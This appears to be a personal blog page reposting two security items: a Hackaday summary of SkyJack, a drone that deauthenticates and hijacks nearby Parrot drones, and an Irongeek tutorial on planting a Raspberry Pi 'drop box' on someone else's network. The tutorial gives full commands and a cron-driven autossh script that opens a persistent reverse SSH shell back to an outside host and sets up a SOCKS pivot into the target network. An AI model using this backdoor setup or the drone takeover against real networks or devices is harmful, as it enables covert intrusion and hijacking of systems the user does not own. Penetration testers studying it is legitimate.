SkyJack: A Drone to Hack All Drones

Standard

http://hackaday.com/2013/12/06/skyjack-a-drone-to-hack-all-drones/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+hackaday%2FLgoM+%28Hack+a+Day%29

HACK A DAY
Fresh hacks every day
HOME
OUR VIDEOS
SUBMIT A TIP
FORUMS
STAFF
DECEMBER 6, 2013
SkyJack: A Drone to Hack All Drones

December 6, 2013 by Josh Marsh 9 Comments
skyjack

Quadcopters are gradually becoming more affordable and thus more popular; we expect more kids will unwrap a prefab drone this holiday season than any year prior. [Samy’s] got plans for the drone-filled future. He could soon be the proud new owner of his own personal army now that he’s built a drone that assimilates others under his control.

The build uses a Parrot AR.Drone 2.0 to fly around with an attached Raspberry Pi, which uses everybody’s favorite Alfa adapter to poke around in promiscuous mode. If the SkyJack detects an IEEE-registered MAC address assigned to Parrot, aircrack-ng leaps into action sending deauthentication requests to the target drone, then attempts to take over control while the original owner is reconnecting. Any successfully lassoed drone doesn’t just fall out of the sky, though. [Samy] uses node-ar-drone to immediately send new instructions to the slave.

You can find all his code on GitHub, but make sure you see the video below, which gives a thorough overview and a brief demonstration. There are also a few other builds that strap a Raspberry Pi onto a quadcopter worth checking out; they could provide you with the inspiration you need to take to the skies.

603 total views, 1 views today

Reverse SSH Shell – Raspberry Pi Recipes

Standard

From: http://www.irongeek.com/i.php?page=security%2Fraspberry-pi-recipes&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29#SSH_Phone_Home:_Using_the_Raspberry_Pi_as_a_proxy/pivot_(Shovel_a_Shell)


SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

        In  this section I’ll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else’s network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I’ve seen do.

  • These are the non-automated commands to do a reverse SSH connection and set up a Proxy/Pivot using OpenSSH:
    On Raspberry Pi use the following command :

        ssh -R 1974:localhost:22 root@some-pc-client

  • On PC (must have SSH server on box):

        ssh -D 1080 -p 1974 pi@localhost

The above command also opens up a SOCKS port on you local PC host that you can use to tunnel traffic into the Raspberry Pis’s network with.

Automating it

    Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site.:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)

        ssh-keygen -t rsa

Use a blank passphrase. This next line is to copy of the key to the PC

        cat ~/.ssh/id_rsa.pub | ssh root@home.irongeek.com “cat – >> ~/.ssh/authorized_keys” 

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:

#!/bin/sh

# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html

# $REMOTE_HOST is the name of the remote system

REMOTE_HOST=home.irongeek.com

 

# Setting my username for home box, you will most likely want to change this

USER_NAME=root

 

# $REMOTE_PORT is the remote port number that will be used to tunnel

# back to this system

REMOTE_PORT=1974

 

# $COMMAND is the command used to create the reverse ssh tunnel

COMMAND=”ssh -q -N -R $REMOTE_PORT:localhost:22 $USER_NAME@$REMOTE_HOST”

 

# Is the tunnel up? Perform two tests:

 

# 1. Check for relevant process ($COMMAND)

pgrep -f -x “$COMMAND” > /dev/null 2>&1 || $COMMAND

 

# 2. Test tunnel by looking at “netstat” output on $REMOTE_HOST

ssh $REMOTE_HOST netstat -an | egrep “tcp.*:$REMOTE_PORT.*LISTEN” \

> /dev/null 2>&1

if [ $? -ne 0 ] ; then

pkill -f -x “$COMMAND”

$COMMAND

fi

 and set it as executable with:

                    chmod 755 autossh

3. Use the “crontab –e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:

        */5 * * * * /home/pi/autossh
SSH Automatic Script

4. Now go to you home PC and you should be able to use this command to connect to the waiting shell:

        ssh –D 1080 -p 1974 pi@localhost

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.

 

926 total views, no views today